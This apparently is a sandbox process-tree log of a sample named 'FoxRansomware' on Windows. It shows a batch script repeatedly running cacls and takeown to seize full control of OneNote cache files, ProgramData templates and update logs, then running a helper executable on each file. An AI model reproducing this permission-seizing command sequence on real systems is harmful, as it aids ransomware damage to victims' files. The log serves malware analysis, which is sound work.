C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C3⤵PID:6244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"3⤵PID:3416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007T.bin" -nobanner3⤵PID:7252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000007T.bin" -nobanner4⤵PID:7520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""2⤵PID:7964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C3⤵PID:7508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"3⤵
- Modifies file permissions
PID:2452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000087.bin" -nobanner3⤵PID:7420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000087.bin" -nobanner4⤵PID:7792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""2⤵PID:60
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C3⤵PID:7908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"3⤵PID:7904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000099.bin" -nobanner3⤵PID:7752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000099.bin" -nobanner4⤵PID:7920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""2⤵PID:288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C3⤵PID:7456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"3⤵PID:8012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000009J.bin" -nobanner3⤵PID:7936
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000009J.bin" -nobanner4⤵PID:7912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""2⤵PID:5152
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4828
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C3⤵PID:6652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"3⤵PID:6908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000A4.bin" -nobanner3⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000A4.bin" -nobanner4⤵PID:6984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""2⤵PID:6992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C3⤵PID:3180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"3⤵PID:2896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AF.bin" -nobanner3⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000AF.bin" -nobanner4⤵PID:5888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""2⤵PID:7612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C3⤵PID:6496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"3⤵PID:7080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AP.bin" -nobanner3⤵PID:6980
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000AP.bin" -nobanner4⤵PID:4020
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""2⤵PID:7044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C3⤵PID:8160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin"3⤵
- Modifies file permissions
PID:5076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000B5.bin" -nobanner3⤵PID:6628
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000B5.bin" -nobanner4⤵PID:6636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:6436
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:7088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "device.png" -nobanner3⤵PID:4128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "device.png" -nobanner4⤵PID:6732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:6156
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:7836
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:5908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:4160
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:6424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:5692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "tasks.xml" -nobanner3⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "tasks.xml" -nobanner4⤵PID:2572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:5728
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:2132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵PID:3284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner4⤵PID:3844
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C3⤵PID:2088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"3⤵PID:6068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner4⤵PID:4912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""2⤵PID:7260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C3⤵PID:4540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"3⤵PID:6872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner3⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner4⤵PID:3080
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""2⤵PID:4032
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C3⤵PID:4836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"3⤵PID:5196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "VdiState.xml" -nobanner3⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "VdiState.xml" -nobanner4⤵PID:4984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl""2⤵PID:3652
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" /E /G Admin:F /C3⤵PID:1416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl"3⤵PID:4376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner3⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner4⤵PID:5400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:5868
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:3508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:2808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "behavior.xml" -nobanner3⤵PID:6568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "behavior.xml" -nobanner4⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:1528
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:5100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:4596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:4860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:6800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:4004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5808
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:5832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:7620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:1692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:7608
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"3⤵PID:6808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:6220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7196
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:6848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:8100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:3664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:6124
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:4748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵
- Modifies file permissions
PID:3264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵PID:3752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:4456
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:7280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵
- Modifies file permissions
PID:6164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵PID:7248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl""2⤵PID:5332
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6316
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" /E /G Admin:F /C3⤵PID:7664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl"3⤵PID:7176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner3⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner4⤵PID:7292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl""2⤵PID:7364
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl"3⤵PID:7688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner3⤵PID:7420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner4⤵PID:7740
-
-
-
